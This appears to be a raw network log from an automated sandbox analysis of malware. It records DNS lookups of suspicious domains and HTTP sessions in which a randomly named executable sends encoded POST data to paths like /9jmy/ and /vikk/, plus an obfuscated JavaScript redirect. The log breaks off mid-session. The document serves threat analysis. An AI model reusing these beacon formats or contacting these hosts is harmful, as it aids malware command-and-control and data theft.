                                                                                              Oct 8, 2024 05:29:03.161566973 CEST1.1.1.1192.168.2.40xf64aNo error (0)www.luxurylive.xyzluxurylive.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:03.161566973 CEST1.1.1.1192.168.2.40xf64aNo error (0)luxurylive.xyz84.32.84.32A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:16.402770996 CEST1.1.1.1192.168.2.40xc6b8No error (0)www.hellosmall.info184.94.215.26A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:29.753278017 CEST1.1.1.1192.168.2.40xb31eNo error (0)www.hcpf.xyz104.21.48.76A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:29.753278017 CEST1.1.1.1192.168.2.40xb31eNo error (0)www.hcpf.xyz172.67.181.186A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:43.214252949 CEST1.1.1.1192.168.2.40x7b03Name error (3)www.sharilyn.orgnonenoneA (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:51.363524914 CEST1.1.1.1192.168.2.40x97fcNo error (0)www.majorconcept.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:51.363524914 CEST1.1.1.1192.168.2.40x97fcNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:29:51.363524914 CEST1.1.1.1192.168.2.40x97fcNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)www.32456.xyz2864dfbc.jiasula.vipCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)2864dfbc.jiasula.vipjiq19281.jisuw-cdn.jiasula.vipCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip185.121.178.197A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip185.121.169.137A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip185.121.169.13A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip156.227.29.89A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip154.218.2.250A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip144.48.83.160A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip103.86.85.62A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip103.86.85.56A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip185.99.134.69A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:05.486008883 CEST1.1.1.1192.168.2.40x2e47No error (0)jiq19281.jisuw-cdn.jiasula.vip185.99.134.109A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:19.064917088 CEST1.1.1.1192.168.2.40x509dNo error (0)www.osi.gardenosi.gardenCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:19.064917088 CEST1.1.1.1192.168.2.40x509dNo error (0)osi.garden68.65.122.222A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:32.378387928 CEST1.1.1.1192.168.2.40x3bc4No error (0)www.aed.shopping35.214.185.243A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:46.140024900 CEST1.1.1.1192.168.2.40xec07No error (0)www.pinkpantys.shoppinkpantys.shopCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:46.140024900 CEST1.1.1.1192.168.2.40xec07No error (0)pinkpantys.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:59.690165043 CEST1.1.1.1192.168.2.40xe959No error (0)www.sdfhfgoool10.lifesdfhfgoool10.lifeCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:59.690165043 CEST1.1.1.1192.168.2.40xe959No error (0)sdfhfgoool10.life3.33.130.190A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:30:59.690165043 CEST1.1.1.1192.168.2.40xe959No error (0)sdfhfgoool10.life15.197.148.33A (IP address)IN (0x0001)false
                                                                                              Oct 8, 2024 05:31:13.798588991 CEST1.1.1.1192.168.2.40xfc29No error (0)www.concept.pinkconcept.pinkCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 8, 2024 05:31:13.798588991 CEST1.1.1.1192.168.2.40xfc29No error (0)concept.pink217.160.0.27A (IP address)IN (0x0001)false
                                                                                              • www.sailforever.xyz
                                                                                              • www.my1pgz.pro
                                                                                              • www.dealsbyaustin.online
                                                                                              • www.portfolioalex.net
                                                                                              • www.luxurylive.xyz
                                                                                              • www.hellosmall.info
                                                                                              • www.hcpf.xyz
                                                                                              • www.majorconcept.xyz
                                                                                              • www.32456.xyz
                                                                                              • www.osi.garden
                                                                                              • www.aed.shopping
                                                                                              • www.pinkpantys.shop
                                                                                              • www.sdfhfgoool10.life
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449793103.106.67.112805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:06.172959089 CEST407OUTGET /uahh/?2FO=QBbT1R8&FJiPC=d5+MqVgVjHVNiwBxeGRD++FKVLlNYwBNfU+SeMm5F41Ss+LbbNQ+rUwfOJuObD11rI3Ncym0QxlhV9b+bLppILaSvV9n+mKxlSe4ZqDWTkAi7XxGHJdw410= HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.sailforever.xyz
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:28:07.032301903 CEST625INHTTP/1.1 302 Found
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Location: https://www.sailforever.xyz/uahh/?2FO=QBbT1R8&FJiPC=d5+MqVgVjHVNiwBxeGRD++FKVLlNYwBNfU+SeMm5F41Ss+LbbNQ+rUwfOJuObD11rI3Ncym0QxlhV9b+bLppILaSvV9n+mKxlSe4ZqDWTkAi7XxGHJdw410=
                                                                                              Server: Dynamic Http Server
                                                                                              X-Ratelimit-Limit: 101
                                                                                              X-Ratelimit-Remaining: 100
                                                                                              X-Ratelimit-Reset: 1
                                                                                              Date: Tue, 08 Oct 2024 03:28:06 GMT
                                                                                              Content-Length: 199
                                                                                              Connection: close
                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 61 69 6c 66 6f 72 65 76 65 72 2e 78 79 7a 2f 75 61 68 68 2f 3f 32 46 4f 3d 51 42 62 54 31 52 38 26 61 6d 70 3b 46 4a 69 50 43 3d 64 35 2b 4d 71 56 67 56 6a 48 56 4e 69 77 42 78 65 47 52 44 2b 2b 46 4b 56 4c 6c 4e 59 77 42 4e 66 55 2b 53 65 4d 6d 35 46 34 31 53 73 2b 4c 62 62 4e 51 2b 72 55 77 66 4f 4a 75 4f 62 44 31 31 72 49 33 4e 63 79 6d 30 51 78 6c 68 56 39 62 2b 62 4c 70 70 49 4c 61 53 76 56 39 6e 2b 6d 4b 78 6c 53 65 34 5a 71 44 57 54 6b 41 69 37 58 78 47 48 4a 64 77 34 31 30 3d 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                              Data Ascii: <a href="https://www.sailforever.xyz/uahh/?2FO=QBbT1R8&amp;FJiPC=d5+MqVgVjHVNiwBxeGRD++FKVLlNYwBNfU+SeMm5F41Ss+LbbNQ+rUwfOJuObD11rI3Ncym0QxlhV9b+bLppILaSvV9n+mKxlSe4ZqDWTkAi7XxGHJdw410=">Found</a>.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449885156.227.17.86805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:22.132260084 CEST666OUTPOST /9jmy/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.my1pgz.pro
                                                                                              Origin: http://www.my1pgz.pro
                                                                                              Referer: http://www.my1pgz.pro/9jmy/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 31 34 44 78 6a 56 53 38 67 55 44 78 76 71 2b 48 63 6b 39 52 71 51 46 42 62 46 6e 48 79 31 31 6a 39 57 2b 62 47 56 2b 42 2b 55 4b 6c 56 59 71 68 75 50 42 44 37 4a 64 65 4d 6e 46 38 47 67 50 79 4e 49 44 42 57 45 33 55 73 73 75 47 67 69 54 34 61 4d 4b 37 79 2f 6a 53 63 41 47 73 6c 39 6b 72 48 6a 59 6a 41 35 48 7a 68 7a 70 34 64 53 73 58 71 6d 4e 4e 2b 75 6f 4e 79 4e 62 79 50 79 6d 36 36 6b 36 44 5a 45 34 4a 44 6f 7a 69 65 33 57 78 6c 47 6a 57 41 33 67 77 31 44 2f 54 78 74 65 34 53 63 6a 79 59 34 6c 79 33 34 51 6b 62 2f 6a 63 37 6c 52 49 59 66 41 61 4c 77 52 6b 63 47 43 77 54 67 3d 3d
                                                                                              Data Ascii: FJiPC=14DxjVS8gUDxvq+Hck9RqQFBbFnHy11j9W+bGV+B+UKlVYqhuPBD7JdeMnF8GgPyNIDBWE3UssuGgiT4aMK7y/jScAGsl9krHjYjA5Hzhzp4dSsXqmNN+uoNyNbyPym66k6DZE4JDozie3WxlGjWA3gw1D/Txte4ScjyY4ly34Qkb/jc7lRIYfAaLwRkcGCwTg==
                                                                                              Oct 8, 2024 05:28:23.030595064 CEST364INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:28:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 99 be 55 9e c6 3e b9 86 a6 be e1 25 c5 c9 ce a6 e5 c9 b9 16 66 fe 2e e9 46 7e e5 b6 b6 ea 9a 36 fa 50 13 01 d3 81 5c 7b 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>%f.F~6P\{Z0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449902156.227.17.86805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:24.675681114 CEST686OUTPOST /9jmy/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.my1pgz.pro
                                                                                              Origin: http://www.my1pgz.pro
                                                                                              Referer: http://www.my1pgz.pro/9jmy/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 31 34 44 78 6a 56 53 38 67 55 44 78 75 4b 75 48 61 48 56 52 72 77 46 43 58 6c 6e 48 34 56 31 76 39 57 43 62 47 58 53 52 2b 6d 2b 6c 56 34 61 68 70 4f 42 44 31 70 64 65 45 48 46 7a 4c 41 50 74 4e 4a 2f 33 57 41 33 55 73 73 4b 47 67 69 44 34 62 37 65 34 77 76 6a 55 55 67 47 75 68 39 6b 72 48 6a 59 6a 41 34 6a 4a 68 7a 78 34 64 68 30 58 6c 6c 56 4b 67 65 6f 4b 78 4e 62 79 5a 43 6d 2b 36 6b 37 6b 5a 47 4d 76 44 71 4c 69 65 32 6d 78 6c 58 6a 5a 4a 33 67 32 37 6a 2b 59 31 4f 2f 78 61 65 7a 79 41 61 31 75 39 34 59 6e 61 35 79 47 71 55 77 66 4b 66 6b 70 57 33 59 51 52 46 2f 35 49 74 65 56 6b 6b 31 6a 42 78 62 62 48 4d 4e 45 4a 67 6a 50 31 46 63 3d
                                                                                              Data Ascii: FJiPC=14DxjVS8gUDxuKuHaHVRrwFCXlnH4V1v9WCbGXSR+m+lV4ahpOBD1pdeEHFzLAPtNJ/3WA3UssKGgiD4b7e4wvjUUgGuh9krHjYjA4jJhzx4dh0XllVKgeoKxNbyZCm+6k7kZGMvDqLie2mxlXjZJ3g27j+Y1O/xaezyAa1u94Yna5yGqUwfKfkpW3YQRF/5IteVkk1jBxbbHMNEJgjP1Fc=
                                                                                              Oct 8, 2024 05:28:25.573026896 CEST364INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:28:25 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 99 be 55 9e c6 3e b9 86 a6 be e1 25 c5 c9 ce a6 e5 c9 b9 16 66 fe 2e e9 46 7e e5 b6 b6 ea 9a 36 fa 50 13 01 d3 81 5c 7b 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>%f.F~6P\{Z0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449918156.227.17.86805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:27.223861933 CEST10768OUTPOST /9jmy/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.my1pgz.pro
                                                                                              Origin: http://www.my1pgz.pro
                                                                                              Referer: http://www.my1pgz.pro/9jmy/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 31 34 44 78 6a 56 53 38 67 55 44 78 75 4b 75 48 61 48 56 52 72 77 46 43 58 6c 6e 48 34 56 31 76 39 57 43 62 47 58 53 52 2b 6d 6d 6c 56 4b 53 68 70 74 5a 44 30 70 64 65 48 48 45 30 4c 41 4f 78 4e 4a 6e 72 57 41 7a 69 73 75 43 47 68 42 62 34 53 71 65 34 35 76 6a 55 57 67 47 6a 6c 39 6b 45 48 6a 49 6e 41 35 54 4a 68 7a 78 34 64 6e 77 58 73 57 4e 4b 69 65 6f 4e 79 4e 62 45 50 79 6d 47 36 6b 6a 65 5a 47 49 5a 44 62 72 69 66 57 32 78 67 6c 4c 5a 43 33 67 30 72 7a 2b 4c 31 4f 7a 79 61 65 2b 4a 41 62 78 55 39 36 45 6e 59 6f 4c 53 75 6e 31 48 58 4f 34 47 57 33 73 6e 63 57 50 75 4f 73 43 66 6f 42 78 30 43 43 6e 55 4d 2f 35 49 63 46 6a 35 70 42 30 61 61 6c 77 69 35 33 76 6e 37 32 75 66 61 64 2f 44 77 72 64 78 68 49 6b 68 78 33 69 78 30 66 31 30 47 6e 30 42 51 4c 52 6a 70 55 70 41 31 35 55 6a 73 74 69 33 2f 53 46 6b 57 4f 6f 56 41 32 6f 65 34 74 36 4f 4b 39 33 68 74 47 58 35 4e 35 4a 49 6c 44 77 61 77 32 44 45 43 78 73 42 41 75 2f 6e 76 48 36 6a 39 47 2b 35 74 4d 61 6b 38 36 49 68 41 2b 71 55 [TRUNCATED]
                                                                                              Data Ascii: FJiPC=14DxjVS8gUDxuKuHaHVRrwFCXlnH4V1v9WCbGXSR+mmlVKShptZD0pdeHHE0LAOxNJnrWAzisuCGhBb4Sqe45vjUWgGjl9kEHjInA5TJhzx4dnwXsWNKieoNyNbEPymG6kjeZGIZDbrifW2xglLZC3g0rz+L1Ozyae+JAbxU96EnYoLSun1HXO4GW3sncWPuOsCfoBx0CCnUM/5IcFj5pB0aalwi53vn72ufad/DwrdxhIkhx3ix0f10Gn0BQLRjpUpA15Ujsti3/SFkWOoVA2oe4t6OK93htGX5N5JIlDwaw2DECxsBAu/nvH6j9G+5tMak86IhA+qUa4AcEGZhUJvr5OV0NoCblgTlVGw6NRs/Nu0I3m7pG0m5ptsnQr4PvTHjSYnfdyqkkyvn5kESu+xsBVWKuctUMYP7xK7MCFtT50Tu8k4JecbFy6mlrOp5nGzze4nB2xqnRmj3IBw+Gt83PA/ygJLqBz2hwgvvGo80UtGZf4dBRXQjL307X6wO0BqNWyCWxN/sOENyDAT0FroaPpLMyPJNucY4PnuS4qmnkUX9TEPoKzzdkQ7krNe6uH4gyg5VENv4BR3hUV8CX1LFD0GTyxm6d5sIbiXQI6aSoD/saPOcm4xiM9TygwMLKI6zK2OE1jynmGTEUcGKTVbXgV53FLzeWYsiiDnyMyqZElPTGF0Xpron6mk+Vwy65gyyr3PpguNVFhno77GGmAGh+1/quBJdd+XTOfa61R2ffBGEkc/ZCCY/P+Wwt1BT9pAWiqFo12jtCYv97o/9o5QKIhXqklG+w0j8rJS9zNi7I5qwG7ihXGrLSd1BAa/u2RheDFUaMcU75a9xcm/ENgZiVEbNEJA/rKeXsZuZJ5NgevAtA3z62tLC/H9j7f3aNCjicVQwSo7RVoGEcslcgcs3yV2Oa4jDiyepSUQEBguUcXRqQKznh/QFGyrOXlyPSNRVBhGS9sQynZcM0h6rb3sOrmtRhssM5QFRsZtPUtw8M+ [TRUNCATED]
                                                                                              Oct 8, 2024 05:28:28.304574013 CEST364INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:28:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 99 be 55 9e c6 3e b9 86 a6 be e1 25 c5 c9 ce a6 e5 c9 b9 16 66 fe 2e e9 46 7e e5 b6 b6 ea 9a 36 fa 50 13 01 d3 81 5c 7b 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>%f.F~6P\{Z0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449934156.227.17.86805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:29.782639027 CEST402OUTGET /9jmy/?FJiPC=46rRghiH6UTMn5OdV0QmjQpTcS7uy0k/o2ugMl2w7VO9VKzwkLZc8aFCTSwfTjrwCajqXliJ4PKjo2fEacCh39HPVzKyhYEUGCUQRILZoBZxTwgJ2Hx73+k=&2FO=QBbT1R8 HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              Host: www.my1pgz.pro
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Oct 8, 2024 05:28:30.716857910 CEST332INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 03:28:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Data Raw: 35 37 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 69 4d 7a 49 33 4c 6d 31 35 4d 57 74 73 63 43 35 77 63 6d 38 36 4f 44 67 32 4e 77 3d 3d 27 29 3c 2f 73 63 72 69 0d 0a 33 0d 0a 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 57<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9iMzI3Lm15MWtscC5wcm86ODg2Nw==')</scri3pt>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449973208.91.197.27805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:36.007236004 CEST696OUTPOST /vikk/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 202
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.dealsbyaustin.online
                                                                                              Origin: http://www.dealsbyaustin.online
                                                                                              Referer: http://www.dealsbyaustin.online/vikk/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 59 79 4f 58 39 47 67 6b 4d 79 2b 53 39 62 45 46 37 65 75 2b 70 68 48 46 37 65 32 74 54 57 72 6a 56 51 2b 4f 36 56 4e 54 38 33 4b 72 72 75 71 56 52 35 75 34 67 67 74 61 5a 58 34 56 63 6d 75 38 72 34 6d 6d 4f 6f 4c 65 4f 76 54 41 62 33 31 67 70 4f 6e 59 47 59 71 6e 39 76 59 58 67 51 59 32 69 49 33 2b 67 71 53 6a 42 44 68 6a 2b 2f 30 5a 4c 77 30 39 4a 35 42 55 7a 48 78 71 76 74 49 54 43 65 50 53 57 65 69 66 56 31 48 46 46 6d 38 46 75 47 61 31 62 4c 4e 58 68 31 63 37 75 63 35 72 34 53 4c 76 55 75 6f 47 73 76 71 67 4b 5a 4d 78 46 53 59 6c 72 4e 36 36 57 6d 6d 72 32 4f 39 4b 4b 77 3d 3d
                                                                                              Data Ascii: FJiPC=YyOX9GgkMy+S9bEF7eu+phHF7e2tTWrjVQ+O6VNT83KrruqVR5u4ggtaZX4Vcmu8r4mmOoLeOvTAb31gpOnYGYqn9vYXgQY2iI3+gqSjBDhj+/0ZLw09J5BUzHxqvtITCePSWeifV1HFFm8FuGa1bLNXh1c7uc5r4SLvUuoGsvqgKZMxFSYlrN66Wmmr2O9KKw==


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449986208.91.197.27805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:38.550568104 CEST716OUTPOST /vikk/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 222
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.dealsbyaustin.online
                                                                                              Origin: http://www.dealsbyaustin.online
                                                                                              Referer: http://www.dealsbyaustin.online/vikk/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 46 4a 69 50 43 3d 59 79 4f 58 39 47 67 6b 4d 79 2b 53 38 36 30 46 2b 35 79 2b 75 42 48 47 77 2b 32 74 64 32 72 6e 56 51 79 4f 36 51 30 57 38 42 61 72 72 4c 47 56 51 34 75 34 6a 67 74 61 4d 6e 34 61 42 32 75 33 72 2f 75 49 4f 71 50 65 4f 76 58 41 62 32 46 67 71 39 50 62 45 49 71 68 6f 2f 59 52 6b 51 59 32 69 49 33 2b 67 70 76 32 42 44 35 6a 2b 50 45 5a 4c 53 63 2b 4b 35 42 56 6c 58 78 71 6c 4e 49 58 43 65 50 77 57 66 2f 45 56 33 2f 46 46 69 30 46 70 54 75 71 53 4c 4e 56 38 46 64 52 6d 39 63 39 35 6e 79 2b 65 73 6f 71 6d 39 54 48 43 2f 64 72 55 6a 35 79 35 4e 65 4a 4c 68 76 66 37 4e 41 44 52 37 6d 6f 57 4f 6c 39 39 36 71 6b 52 58 62 59 4d 57 6f 4e 6e 59 49 3d
                                                                                              Data Ascii: FJiPC=YyOX9GgkMy+S860F+5y+uBHGw+2td2rnVQyO6Q0W8BarrLGVQ4u4jgtaMn4aB2u3r/uIOqPeOvXAb2Fgq9PbEIqho/YRkQY2iI3+gpv2BD5j+PEZLSc+K5BVlXxqlNIXCePwWf/EV3/FFi0FpTuqSLNV8FdRm9c95ny+esoqm9THC/drUj5y5NeJLhvf7NADR7moWOl996qkRXbYMWoNnYI=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.450004208.91.197.27805344C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 05:28:41.307555914 CEST10798OUTPOST /vikk/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10302
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Connection: close
                                                                                              Host: www.dealsbyaustin.online
                                                                                              Origin: http://www.dealsbyaustin.online
                                                                                              Referer: http://www.dealsbyaustin.online/vikk/
                                                                                              User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
